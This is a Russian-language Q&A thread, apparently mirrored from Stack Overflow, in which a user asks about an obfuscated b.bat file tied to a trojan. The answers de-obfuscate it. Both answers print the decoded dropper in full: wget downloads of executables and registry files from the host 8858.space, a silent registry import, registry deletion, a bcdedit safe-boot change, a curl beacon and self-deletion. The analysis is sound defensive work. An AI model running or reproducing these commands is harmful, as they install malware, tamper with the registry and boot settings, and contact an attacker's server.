Найдена странная летучая мышь в каталоге Windows, который связан с обнаруженным трояном, что он делает? - PullRequest
Новая
       69

Найдена странная летучая мышь в каталоге Windows, который связан с обнаруженным трояном, что он делает?

2 голосов
/ 23 февраля 2020

Я проводил проверку на наличие вирусов HitmanPro, и она обнаружила b.exe , которая находилась в моем каталоге windows. Был еще один файл, b.bat, предположительно связанный с b.exe, в котором есть очень странный код, который я никогда не видел. Что делает летучая мышь?

она запускается с настройками странных параметров. 

@echo off 
::
set "sym=_"
set "a3=t"
set "j=e"
set "xj66=s"
::

Затем использует их для создания длинного списка странных команд, вот фрагмент этого: 

s%j%%a3% "yui=5"
s%j%%a3% "zx3=""
s%j%%a3% "gs1=in"
s%j%%a3% "gdfg5=W"
s%j%%a3% "a5=."
s%j%%a3% "c44=a"

Далее следует настройка и выполнение более странных вещей: 

set "title=%rn%"
set "sub=%sid%"
set "pos=%pid%"
%pi%%j%g d%j%l%j%t%j% %yr3%H%lkj6%L%gdg5%%hy%S%vbvc56%FT%gdfg5%A%ssd3%E%hy%%gdg5%%n3%c%pi%%fsf4%s%fsf4%f%a3%%hy%%gdfg5%%n3%nd%fsf4%w%xj66%%hy%Cu%pi%r%j%n%a3%V%j%%pi%s%n3%%fsf4%n%hy%Un%n3%n%xj66%%a3%al%aa2%%hy%%title%%yr3% %a4%f %a4%r%j%g%a6%32

Вот Pastebin полного кода летучей мыши

Какого черта эта вещь делать?!?!

Ответы [ 2 ]

3 голосов
/ 23 февраля 2020

Вы можете применить метод, использованный в моем ответе Странный зашифрованный cmd скрипт, отправленный по электронной почте :

Сначала из четырех явных команд set в начале сценария выведите, что s%j%%a3% соответствует команде set, поэтому позвольте им всем работать (потому что я не вижу попыток переписать какую-либо жизненно важную переменную среды или другие грязные трюки).

Для деобфускации остальная часть кода насколько это возможно безопасно (при условии, что он может быть неполным и слегка испорченным), вы можете настроить его перед запуском , чтобы просто отображал любые потенциально опасные операции вместо запустив их , используя команду ECHO в строках 57 и 199..220 (т. е. во всех строках, кроме тех, которые имеют set …).

В результате из скорректированный код, который вы видите наиболее опасные операции в Windows реестре, загрузка и запуск неизвестных исполняемых файлов, изменение Boot Configuration Data et c. : * 1 034 * 

D:\bat\SO\60357115.bat

for /f "usebackq delims=" %i in ("s.txt") do set %~i
reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\" /f /reg:32
C:\WINDOWS\Wget\bin\wget.exe -c -P "C:\WINDOWS" "http://8858.space/rs/st/d.bat" --referer="alpha"
C:\WINDOWS\Wget\bin\wget.exe -c -P "C:\WINDOWS" "http://8858.space/rs/st/c.exe" --referer="alpha"
C:\WINDOWS\Wget\bin\wget.exe -c -P "C:\WINDOWS" "http://8858.space/rs/st/d.exe" --referer="alpha"
C:\WINDOWS\Wget\bin\wget.exe -c -P "C:\WINDOWS" "http://8858.space/rs/st/c.bat" --referer="alpha"
C:\WINDOWS\Wget\bin\wget.exe -c -P "C:\WINDOWS" "http://8858.space/rs/st/c.reg" --referer="alpha"
C:\WINDOWS\Wget\bin\wget.exe -c -P "C:\WINDOWS" "http://8858.space/rs/st/e.reg" --referer="alpha"
C:\WINDOWS\Wget\bin\wget.exe -c -P "C:\WINDOWS" "http://8858.space/rs/st/d.reg" --referer="alpha"
C:\WINDOWS\Wget\bin\wget.exe -c -P "C:\WINDOWS" "http://8858.space/rs/st/mgr_n.reg" --referer="alpha"
C:\WINDOWS\Wget\bin\wget.exe -c -P "C:\WINDOWS" "http://8858.space/rs/st/mgr_f.reg" --referer="alpha"
C:\WINDOWS\Wget\bin\wget.exe -c -P "C:\WINDOWS" "http://8858.space/rs/st/usw.reg" --referer="alpha"
C:\WINDOWS\Wget\bin\wget.exe -c -P "C:\WINDOWS" "http://8858.space/rs/st/at.reg" --referer="alpha"
C:\WINDOWS\Wget\bin\wget.exe -c -P "C:\WINDOWS" "http://8858.space/rs/st/ct.reg" --referer="alpha"
C:\WINDOWS\Wget\bin\wget.exe -c -P "C:\WINDOWS" "http://8858.space/rs/st/et.reg" --referer="alpha"
C:\WINDOWS\Wget\bin\wget.exe -c -P "C:\WINDOWS" "http://8858.space/rs/st/mt.reg" --referer="alpha"
regedit /s C:\WINDOWS\c.reg
bcdedit /set "{current}" safeboot "minimal"
del C:\WINDOWS\b.exe
del C:\WINDOWS\c.reg
C:\WINDOWS\curl\curl.exe "http://8858.space/curl/runi.php?subid=_" --referer "alpha"
C:\WINDOWS\Wget\bin\wget.exe -c -P "C:\WINDOWS" "http://8858.space/rs/st/y.txt" --referer="alpha"
del D:\bat\SO\60357115.bat
1 голос
/ 23 февраля 2020

Второй блок расширяется до команд 'set', подставляя% j% и% a3% вместо 'e' и 't': 

set "yui=5"
set "zx3=""
set "gs1=in"
set "gdfg5=W"
set "a5=."
set "c44=a"

К настоящему времени вы должны понять, что это техника запутывания, которая расширяется к сценарию, который он хочет запустить в вашей системе. Вставьте setlocal в начале сценария и обезвредите вредоносные строки с помощью echo , чтобы извлечь значение: 

for /f "usebackq delims=" %i in ("s.txt") do set %~i
set "title="
set "sub="
set "pos="
reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\" /f /reg:32
C:\WINDOWS\Wget\bin\wget.exe -c -P "C:\WINDOWS" "http://8858.space/rs/st/d.bat" --referer="alpha"
C:\WINDOWS\Wget\bin\wget.exe -c -P "C:\WINDOWS" "http://8858.space/rs/st/c.exe" --referer="alpha"
C:\WINDOWS\Wget\bin\wget.exe -c -P "C:\WINDOWS" "http://8858.space/rs/st/d.exe" --referer="alpha"
C:\WINDOWS\Wget\bin\wget.exe -c -P "C:\WINDOWS" "http://8858.space/rs/st/c.bat" --referer="alpha"
C:\WINDOWS\Wget\bin\wget.exe -c -P "C:\WINDOWS" "http://8858.space/rs/st/c.reg" --referer="alpha"
C:\WINDOWS\Wget\bin\wget.exe -c -P "C:\WINDOWS" "http://8858.space/rs/st/e.reg" --referer="alpha"
C:\WINDOWS\Wget\bin\wget.exe -c -P "C:\WINDOWS" "http://8858.space/rs/st/d.reg" --referer="alpha"
C:\WINDOWS\Wget\bin\wget.exe -c -P "C:\WINDOWS" "http://8858.space/rs/st/mgr_n.reg" --referer="alpha"
C:\WINDOWS\Wget\bin\wget.exe -c -P "C:\WINDOWS" "http://8858.space/rs/st/mgr_f.reg" --referer="alpha"
C:\WINDOWS\Wget\bin\wget.exe -c -P "C:\WINDOWS" "http://8858.space/rs/st/usw.reg" --referer="alpha"
C:\WINDOWS\Wget\bin\wget.exe -c -P "C:\WINDOWS" "http://8858.space/rs/st/at.reg" --referer="alpha"
C:\WINDOWS\Wget\bin\wget.exe -c -P "C:\WINDOWS" "http://8858.space/rs/st/ct.reg" --referer="alpha"
C:\WINDOWS\Wget\bin\wget.exe -c -P "C:\WINDOWS" "http://8858.space/rs/st/et.reg" --referer="alpha"
C:\WINDOWS\Wget\bin\wget.exe -c -P "C:\WINDOWS" "http://8858.space/rs/st/mt.reg" --referer="alpha"
regedit /s C:\WINDOWS\c.reg
bcdedit /set "{current}" safeboot "minimal"
del C:\WINDOWS\b.exe
del C:\WINDOWS\c.reg
C:\WINDOWS\curl\curl.exe "http://8858.space/curl/runi.php?subid=_" --referer "alpha"
C:\WINDOWS\Wget\bin\wget.exe -c -P "C:\WINDOWS" "http://8858.space/rs/st/y.txt" --referer="alpha"
del b.bat

Некоторое значение потеряно, например переменные title , sub и pos , вероятно, определенные в s.txt - но то, что он делает, совершенно ясно: он изменяет ваш реестр и конфигурацию загрузки, загружает больше вредоносных программ и самостоятельно удаляет. Если бы это запустилось на моем компьютере, я бы сделал резервную копию своих материалов, отформатировал и переустановил.

...